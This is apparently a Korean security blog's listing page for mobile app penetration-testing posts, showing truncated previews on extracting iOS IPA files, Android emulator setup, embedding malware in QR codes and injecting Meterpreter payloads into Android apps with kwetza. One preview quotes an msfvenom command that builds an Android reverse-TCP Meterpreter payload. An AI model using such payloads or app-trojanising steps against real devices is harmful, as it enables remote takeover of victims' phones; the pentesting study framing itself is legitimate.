4. 모바일 앱 취약점 진단22 [iOS] IPA 추출하기 아이폰에서 진단하기 위한 앱을 다운로드 받는 경우 보통 앱스토어에서 설치하거나 TestFlight(테스트용 앱을 배포하여 다운로드받는 앱)를 사용하여 다운받는 경우가 많다.이러한 앱을 PC로 꺼내서 분석하기 위해서는 앱을 IPA로 추출하는 과정이 반드시 필요하다.IPA 추출에는 아래의 2가지 방식을 주로 사용한다.CrackerXI+ 앱 사용탈옥을 진행하고 나면 CrackerXI+라는 앱을 설치할 수 있게 된다. 해당 앱에 접근 후 설정에서 아래의 설정 값을 적용한다.설정 값을 적용하고 AppList로 돌아가서 IPA 추출을 원하는 앱을 터치하면 IPA가 추출되는 방식이다.이 방식은 IPA를 추출하기 가장 편리한 방식이지만 앱이 AppList에 뜨지 않는 경우나 에러가 발생하는 경우가 많다. 그렇게 된 경.. 2024. 6. 19. 안드로이드 가상환경을 구축하기 - Genymotion, 블루스택, Nox 1. 지니모션 https://www.genymotion.com/ Android Emulator on the Cloud and cross-platform - Genymotion Genymotion is an Android emulator "as a service" on the Cloud, as images for Cloud providers and locally for PC and Mac. www.genymotion.com 버추얼 박스와 같이 활용할 수 있는 지니 모션입니다. 버추얼 박스가 있는 경우 with virtual box 버전, 없으면 without으로 설치합니다. AVD처럼 가상 안드로이드 디바이스를 활용할 수 있기때문에 가상 안드로이드 모의해킹 환경을 만들기 좋습니다. 모든 기능을 사용하고자 .. 2023. 12. 28. QR코드에 악성코드 주입하는 방법 https://blog.naver.com/dhwkffk/221963271849 QR코드에 악성코드 주입하는 방법 1.msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.0 lport=4444 R > QRc... blog.naver.com 2023. 12. 27. 안드로이드 앱에 악성코드 넣기 [kwetza] https://github.com/sensepost/kwetza GitHub - sensepost/kwetza: Python script to inject existing Android applications with a Meterpreter payload. Python script to inject existing Android applications with a Meterpreter payload. - GitHub - sensepost/kwetza: Python script to inject existing Android applications with a Meterpreter payload. github.com kwetza와 함께 apktool도 필요합니다. apktool은 apk 파일을 디컴파일 .. 2023. 12. 26. 이전 1 2 3 4 5 6 다음
